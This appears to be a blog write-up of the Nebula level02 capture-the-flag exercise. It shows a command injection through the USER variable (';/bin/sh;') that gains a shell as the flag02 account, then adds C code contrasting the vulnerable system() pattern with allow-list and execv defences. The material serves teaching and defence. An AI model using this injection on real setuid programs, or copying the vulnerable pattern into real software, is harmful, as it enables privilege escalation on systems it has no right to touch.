We start off with understanding what is being asked of us:
We start by SSH'ing in as level02 and checking out the /home/flag02 directory:
level02@nebula:~$ cd /home/flag02/
level02@nebula:/home/flag02$ ls -lah
total 13K
drwxr-x--- 2 flag02 level02   80 2011-11-20 21:22 .
drwxr-xr-x 1 root   root     100 2012-08-27 07:18 ..
-rw-r--r-- 1 flag02 flag02   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag02 flag02  3.3K 2011-05-18 02:54 .bashrc
-rwsr-x--- 1 flag02 level02 7.3K 2011-11-20 21:22 flag02
-rw-r--r-- 1 flag02 flag02   675 2011-05-18 02:54 .profile
level02@nebula:/home/flag02$
We examine the code and run the flag02 file:
level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo level02 is cool")
level02 is cool
level02@nebula:/home/flag02$
As expected, the file echoes the current user and says that we are cool :)
However, just like in level01, there are still some issues in this code. The programmer did not consider any malicious user input.
In this example, asprintf builds the command string from the value returned by getenv("USER"), an environment variable that is entirely under our control. Let's see what is currently in there:
level02@nebula:/home/flag02$ echo $USER
level02
level02@nebula:/home/flag02$
As you can see, this is "level02". What happens if we update it to something else? Say, "geoda" for example:
level02@nebula:/home/flag02$ export USER=geoda
level02@nebula:/home/flag02$ echo $USER
geoda
level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo geoda is cool")
geoda is cool
level02@nebula:/home/flag02$
As expected, we have updated the $USER variable to "geoda" instead of the current user "level02". When we run the file, it will print "geoda" instead.
Now, how do we exploit this further?
Well, looking at the program, we can "close" the echo command with a semicolon; the shell that system() starts then runs whatever follows it, so we can make it start a system shell.
To do this, we update our $USER variable with the following ";/bin/sh;":
level02@nebula:/home/flag02$ echo $USER
geoda
level02@nebula:/home/flag02$ export USER=";/bin/sh;"
level02@nebula:/home/flag02$ echo $USER
;/bin/sh;
level02@nebula:/home/flag02$
Now, when we execute ./flag02, the program builds the command "/bin/echo ;/bin/sh; is cool". Instead of echoing ";/bin/sh; is cool", the shell treats our first semicolon as the end of the echo command and executes /bin/sh next:
level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo ;/bin/sh; is cool")
sh-4.2$ id
uid=997(flag02) gid=1003(level02) groups=997(flag02),1003(level02)
sh-4.2$ getflag
You have successfully executed getflag on a target account
sh-4.2$
Excellent!
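To make the underlying bug and its fix concrete, here is an added example; it is not the Nebula level02 source (which this post does not reproduce) and the function names are its own. It reconstructs the pattern described above, a user-controlled USER value formatted into the string the original program hands to system(), and puts two defensive alternatives beside it: an allow-list check on the value, and running /bin/echo through an argv vector so no shell ever parses the string. The original uses asprintf; this example builds the same string with snprintf.

```c
/* Added example, not the Nebula level02 source. Reconstructs the pattern the
 * post describes (USER formatted into a command string passed to system())
 * and shows two mitigations. Function names are this example's own. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Vulnerable pattern: builds exactly the string system() would receive.
 * USER is pasted into a shell command line unmodified, so a semicolon in it
 * ends the echo command and whatever follows becomes a second command.
 * Caller frees the result. (The original uses asprintf; same string.) */
char *build_shell_command(const char *user)
{
    const char *fmt = "/bin/echo %s is cool";
    int n = snprintf(NULL, 0, fmt, user);
    if (n < 0)
        return NULL;
    char *buffer = malloc((size_t)n + 1);
    if (buffer == NULL)
        return NULL;
    snprintf(buffer, (size_t)n + 1, fmt, user);
    return buffer;
}

/* Mitigation 1: strict allow-list for what a user name may contain.
 * Returns 1 for a non-empty string of [A-Za-z0-9_-] only; anything else
 * (';', '$', '`', '|', spaces, ...) is rejected before reaching a shell. */
int is_safe_username(const char *user)
{
    if (user == NULL || *user == '\0')
        return 0;
    for (const unsigned char *p = (const unsigned char *)user; *p; p++) {
        if (!isalnum(*p) && *p != '_' && *p != '-')
            return 0;
    }
    return 1;
}

/* Mitigation 2: never hand user data to a shell at all. fork() + execv() with
 * an argv vector passes USER to /bin/echo as one literal argument, so a value
 * like ";/bin/sh;" is printed, not interpreted. Returns the child's exit
 * status, or -1 on failure. */
int run_echo_without_shell(const char *user)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0) {
        char *const argv[] = { "/bin/echo", (char *)user, "is", "cool", NULL };
        execv("/bin/echo", argv);
        _exit(127); /* only reached if execv() fails */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *user = getenv("USER");
    if (user == NULL)
        user = "(unset)";

    /* Show what the vulnerable program would run, without running it. */
    char *cmd = build_shell_command(user);
    printf("vulnerable program would call system(\"%s\")\n", cmd ? cmd : "(null)");
    free(cmd);

    if (!is_safe_username(user)) {
        fprintf(stderr, "refusing USER=%s: characters outside [A-Za-z0-9_-]\n", user);
        return 1;
    }
    return run_echo_without_shell(user) == 0 ? 0 : 1;
}
```

Run it once with USER unchanged and once with USER=";/bin/sh;" exported as in the post: the first prints "<user> is cool" through execv, the second is refused by the allow-list, and even if the check were removed, execv would print the literal ";/bin/sh; is cool" rather than start a shell. Of the two mitigations, avoiding the shell is the one that holds up; the allow-list is defence in depth for the cases where a shell is unavoidable.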
The next post will be level03.
Thanks for reading!
-geoda